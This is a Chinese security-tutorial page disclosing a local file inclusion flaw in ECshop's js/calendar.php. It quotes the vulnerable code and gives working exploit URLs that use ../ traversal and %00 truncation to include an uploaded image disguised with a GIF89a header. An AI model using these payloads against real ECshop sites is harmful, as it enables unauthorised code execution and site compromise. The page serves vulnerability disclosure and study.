网站地图    收藏   

主页 > 后端 > 网站安全 >

ECshop本地包含漏洞 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] js/calendar.php$lang = (!empty($_GET[#39;lang#39;])) ? trim($_GET[#39;lang#39;]) : lsquo;zh_cnrsquo;;//没有过滤,很明显的包含漏洞if (!file_exists(lsquo;../languages/rsquo;. $lang ......

js/calendar.php
$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞
if (!file_exists(‘../languages/’. $lang . ‘/calendar.php’))
{ $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’. EC_CHARSET); include_once(‘../languages/’. $lang . ‘/calendar.php’);//这里包含,需要截断

测试代码: //

需要magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.(注意后面有个.)
 
利用方法:
先注册用户 然后上传GIF89a头的GIF文件欺骗, 然后包含代码:
http://www.2cto.com /js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.
 
 
作者 Lynn’s blog

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论